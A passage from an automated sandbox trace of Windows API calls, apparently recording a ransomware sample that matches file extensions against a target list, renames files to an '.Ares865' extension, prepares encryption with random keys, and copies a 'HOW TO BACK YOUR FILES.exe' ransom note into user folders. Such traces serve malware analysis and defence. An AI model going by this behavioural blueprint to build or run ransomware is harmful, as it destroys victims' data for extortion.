3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dcx") returned 1 [0092.104] lstrlenW (lpString="ddl") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="ddl") returned 1 [0092.104] lstrlenW (lpString="dlis") returned 4 [0092.104] lstrcmpiW (lpString1=".swf", lpString2="dlis") returned -1 [0092.104] lstrlenW (lpString="dp1") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dp1") returned 1 [0092.104] lstrlenW (lpString="dqy") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dqy") returned 1 [0092.104] lstrlenW (lpString="dsk") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dsk") returned 1 [0092.104] lstrlenW (lpString="dsn") returned 3 [0092.104] lstrcmpiW (lpString1="swf", lpString2="dsn") returned 1 [0092.105] lstrlenW (lpString="dtsx") returned 4 [0092.105] lstrcmpiW (lpString1=".swf", lpString2="dtsx") returned -1 [0092.105] lstrlenW (lpString="dxl") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="dxl") returned 1 [0092.105] lstrlenW (lpString="eco") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="eco") returned 1 [0092.105] lstrlenW (lpString="ecx") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="ecx") returned 1 [0092.105] lstrlenW (lpString="edb") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="edb") returned 1 [0092.105] lstrlenW (lpString="epim") returned 4 [0092.105] lstrcmpiW (lpString1=".swf", lpString2="epim") returned -1 [0092.105] lstrlenW (lpString="fcd") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fcd") returned 1 [0092.105] lstrlenW (lpString="fdb") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fdb") returned 1 [0092.105] lstrlenW (lpString="fic") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fic") returned 1 [0092.105] lstrlenW (lpString="flexolibrary") returned 12 [0092.105] lstrcmpiW (lpString1="GkmB8mEK.swf", lpString2="flexolibrary") returned 1 [0092.105] lstrlenW (lpString="fm5") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fm5") returned 1 [0092.105] lstrlenW (lpString="fmp") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fmp") returned 1 [0092.105] lstrlenW (lpString="fmp12") returned 5 [0092.105] lstrcmpiW (lpString1="K.swf", lpString2="fmp12") returned 1 [0092.105] lstrlenW (lpString="fmpsl") returned 5 [0092.105] lstrcmpiW (lpString1="K.swf", lpString2="fmpsl") returned 1 [0092.105] lstrlenW (lpString="fol") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fol") returned 1 [0092.105] lstrlenW (lpString="fp3") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fp3") returned 1 [0092.105] lstrlenW (lpString="fp4") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fp4") returned 1 [0092.105] lstrlenW (lpString="fp5") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fp5") returned 1 [0092.105] lstrlenW (lpString="fp7") returned 3 [0092.105] lstrcmpiW (lpString1="swf", lpString2="fp7") returned 1 [0092.105] lstrlenW (lpString="fpt") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="fpt") returned 1 [0092.106] lstrlenW (lpString="frm") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="frm") returned 1 [0092.106] lstrlenW (lpString="gdb") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="gdb") returned 1 [0092.106] lstrlenW (lpString="gdb") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="gdb") returned 1 [0092.106] lstrlenW (lpString="grdb") returned 4 [0092.106] lstrcmpiW (lpString1=".swf", lpString2="grdb") returned -1 [0092.106] lstrlenW (lpString="gwi") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="gwi") returned 1 [0092.106] lstrlenW (lpString="hdb") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="hdb") returned 1 [0092.106] lstrlenW (lpString="his") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="his") returned 1 [0092.106] lstrlenW (lpString="ib") returned 2 [0092.106] lstrcmpiW (lpString1="wf", lpString2="ib") returned 1 [0092.106] lstrlenW (lpString="idb") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="idb") returned 1 [0092.106] lstrlenW (lpString="ihx") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="ihx") returned 1 [0092.106] lstrlenW (lpString="itdb") returned 4 [0092.106] lstrcmpiW (lpString1=".swf", lpString2="itdb") returned -1 [0092.106] lstrlenW (lpString="itw") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="itw") returned 1 [0092.106] lstrlenW (lpString="jet") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="jet") returned 1 [0092.106] lstrlenW (lpString="jtx") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="jtx") returned 1 [0092.106] lstrlenW (lpString="kdb") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="kdb") returned 1 [0092.106] lstrlenW (lpString="kexi") returned 4 [0092.106] lstrcmpiW (lpString1=".swf", lpString2="kexi") returned -1 [0092.106] lstrlenW (lpString="kexic") returned 5 [0092.106] lstrcmpiW (lpString1="K.swf", lpString2="kexic") returned -1 [0092.106] lstrlenW (lpString="kexis") returned 5 [0092.106] lstrcmpiW (lpString1="K.swf", lpString2="kexis") returned -1 [0092.106] lstrlenW (lpString="lgc") returned 3 [0092.106] lstrcmpiW (lpString1="swf", lpString2="lgc") returned 1 [0092.107] lstrlenW (lpString="lwx") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="lwx") returned 1 [0092.107] lstrlenW (lpString="maf") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="maf") returned 1 [0092.107] lstrlenW (lpString="maq") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="maq") returned 1 [0092.107] lstrlenW (lpString="mar") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mar") returned 1 [0092.107] lstrlenW (lpString="marshal") returned 7 [0092.107] lstrcmpiW (lpString1="mEK.swf", lpString2="marshal") returned 1 [0092.107] lstrlenW (lpString="mas") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mas") returned 1 [0092.107] lstrlenW (lpString="mav") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mav") returned 1 [0092.107] lstrlenW (lpString="maw") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="maw") returned 1 [0092.107] lstrlenW (lpString="mdbhtml") returned 7 [0092.107] lstrcmpiW (lpString1="mEK.swf", lpString2="mdbhtml") returned 1 [0092.107] lstrlenW (lpString="mdn") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mdn") returned 1 [0092.107] lstrlenW (lpString="mdt") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mdt") returned 1 [0092.107] lstrlenW (lpString="mfd") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mfd") returned 1 [0092.107] lstrlenW (lpString="mpd") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mpd") returned 1 [0092.107] lstrlenW (lpString="mrg") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mrg") returned 1 [0092.107] lstrlenW (lpString="mud") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mud") returned 1 [0092.107] lstrlenW (lpString="mwb") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="mwb") returned 1 [0092.107] lstrlenW (lpString="myd") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="myd") returned 1 [0092.107] lstrlenW (lpString="ndf") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="ndf") returned 1 [0092.107] lstrlenW (lpString="nnt") returned 3 [0092.107] lstrcmpiW (lpString1="swf", lpString2="nnt") returned 1 [0092.107] lstrlenW (lpString="nrmlib") returned 6 [0092.108] lstrcmpiW (lpString1="EK.swf", lpString2="nrmlib") returned -1 [0092.108] lstrlenW (lpString="ns2") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="ns2") returned 1 [0092.108] lstrlenW (lpString="ns3") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="ns3") returned 1 [0092.108] lstrlenW (lpString="ns4") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="ns4") returned 1 [0092.108] lstrlenW (lpString="nsf") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="nsf") returned 1 [0092.108] lstrlenW (lpString="nv") returned 2 [0092.108] lstrcmpiW (lpString1="wf", lpString2="nv") returned 1 [0092.108] lstrlenW (lpString="nv2") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="nv2") returned 1 [0092.108] lstrlenW (lpString="nwdb") returned 4 [0092.108] lstrcmpiW (lpString1=".swf", lpString2="nwdb") returned -1 [0092.108] lstrlenW (lpString="nyf") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="nyf") returned 1 [0092.108] lstrlenW (lpString="odb") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="odb") returned 1 [0092.108] lstrlenW (lpString="odb") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="odb") returned 1 [0092.108] lstrlenW (lpString="oqy") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="oqy") returned 1 [0092.108] lstrlenW (lpString="ora") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="ora") returned 1 [0092.108] lstrlenW (lpString="orx") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="orx") returned 1 [0092.108] lstrlenW (lpString="owc") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="owc") returned 1 [0092.108] lstrlenW (lpString="p96") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="p96") returned 1 [0092.108] lstrlenW (lpString="p97") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="p97") returned 1 [0092.108] lstrlenW (lpString="pan") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="pan") returned 1 [0092.108] lstrlenW (lpString="pdb") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="pdb") returned 1 [0092.108] lstrlenW (lpString="pdm") returned 3 [0092.108] lstrcmpiW (lpString1="swf", lpString2="pdm") returned 1 [0092.109] lstrlenW (lpString="pnz") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="pnz") returned 1 [0092.109] lstrlenW (lpString="qry") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="qry") returned 1 [0092.109] lstrlenW (lpString="qvd") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="qvd") returned 1 [0092.109] lstrlenW (lpString="rbf") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="rbf") returned 1 [0092.109] lstrlenW (lpString="rctd") returned 4 [0092.109] lstrcmpiW (lpString1=".swf", lpString2="rctd") returned -1 [0092.109] lstrlenW (lpString="rod") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="rod") returned 1 [0092.109] lstrlenW (lpString="rodx") returned 4 [0092.109] lstrcmpiW (lpString1=".swf", lpString2="rodx") returned -1 [0092.109] lstrlenW (lpString="rpd") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="rpd") returned 1 [0092.109] lstrlenW (lpString="rsd") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="rsd") returned 1 [0092.109] lstrlenW (lpString="sas7bdat") returned 8 [0092.109] lstrcmpiW (lpString1="8mEK.swf", lpString2="sas7bdat") returned -1 [0092.109] lstrlenW (lpString="sbf") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="sbf") returned 1 [0092.109] lstrlenW (lpString="scx") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="scx") returned 1 [0092.109] lstrlenW (lpString="sdb") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="sdb") returned 1 [0092.109] lstrlenW (lpString="sdc") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="sdc") returned 1 [0092.109] lstrlenW (lpString="sdf") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="sdf") returned 1 [0092.109] lstrlenW (lpString="sis") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="sis") returned 1 [0092.109] lstrlenW (lpString="spq") returned 3 [0092.109] lstrcmpiW (lpString1="swf", lpString2="spq") returned 1 [0092.109] lstrlenW (lpString="te") returned 2 [0092.109] lstrcmpiW (lpString1="wf", lpString2="te") returned 1 [0092.109] lstrlenW (lpString="teacher") returned 7 [0092.109] lstrcmpiW (lpString1="mEK.swf", lpString2="teacher") returned -1 [0092.110] lstrlenW (lpString="tmd") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="tmd") returned -1 [0092.110] lstrlenW (lpString="tps") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="tps") returned -1 [0092.110] lstrlenW (lpString="trc") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="trc") returned -1 [0092.110] lstrlenW (lpString="trc") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="trc") returned -1 [0092.110] lstrlenW (lpString="trm") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="trm") returned -1 [0092.110] lstrlenW (lpString="udb") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="udb") returned -1 [0092.110] lstrlenW (lpString="udl") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="udl") returned -1 [0092.110] lstrlenW (lpString="usr") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="usr") returned -1 [0092.110] lstrlenW (lpString="v12") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="v12") returned -1 [0092.110] lstrlenW (lpString="vis") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="vis") returned -1 [0092.110] lstrlenW (lpString="vpd") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="vpd") returned -1 [0092.110] lstrlenW (lpString="vvv") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="vvv") returned -1 [0092.110] lstrlenW (lpString="wdb") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="wdb") returned -1 [0092.110] lstrlenW (lpString="wmdb") returned 4 [0092.110] lstrcmpiW (lpString1=".swf", lpString2="wmdb") returned -1 [0092.110] lstrlenW (lpString="wrk") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="wrk") returned -1 [0092.110] lstrlenW (lpString="xdb") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="xdb") returned -1 [0092.110] lstrlenW (lpString="xld") returned 3 [0092.110] lstrcmpiW (lpString1="swf", lpString2="xld") returned -1 [0092.110] lstrlenW (lpString="xmlff") returned 5 [0092.110] lstrcmpiW (lpString1="K.swf", lpString2="xmlff") returned -1 [0092.110] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\RgGkmB8mEK.swf.Ares865") returned 101 [0092.110] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\RgGkmB8mEK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\rggkmb8mek.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\RgGkmB8mEK.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\rggkmb8mek.swf.ares865"), dwFlags=0x1) returned 1 [0092.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\RgGkmB8mEK.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\rggkmb8mek.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.111] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=74190) returned 1 [0092.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.112] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.112] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.112] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.113] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x124d0, lpName=0x0) returned 0x15c [0092.113] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x124d0) returned 0x190000 [0092.116] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.116] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.116] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.117] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.118] CloseHandle (hObject=0x15c) returned 1 [0092.118] CloseHandle (hObject=0x118) returned 1 [0092.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.119] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e3acc40, ftCreationTime.dwHighDateTime=0x1d4d319, ftLastAccessTime.dwLowDateTime=0xc1a6c760, ftLastAccessTime.dwHighDateTime=0x1d4cea7, ftLastWriteTime.dwLowDateTime=0xc1a6c760, ftLastWriteTime.dwHighDateTime=0x1d4cea7, nFileSizeHigh=0x0, nFileSizeLow=0x121ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RgGkmB8mEK.swf", cAlternateFileName="RGGKMB~1.SWF")) returned 0 [0092.119] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.119] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0092.119] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0092.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2edcc0 | out: hHeap=0x2b0000) returned 1 [0092.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0092.119] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned 39 [0092.120] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0092.120] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.120] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.120] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.120] GetLastError () returned 0x0 [0092.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.120] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.120] CloseHandle (hObject=0x120) returned 1 [0092.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.121] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.121] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.121] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.121] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.121] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.121] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.121] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.121] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.121] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.121] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.121] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d0c5c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.121] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.121] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d0c5c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0092.121] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.121] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0092.121] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0092.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df7d0 | out: hHeap=0x2b0000) returned 1 [0092.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0092.121] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned 40 [0092.121] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0092.122] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.122] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.122] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.122] GetLastError () returned 0x0 [0092.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.122] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, 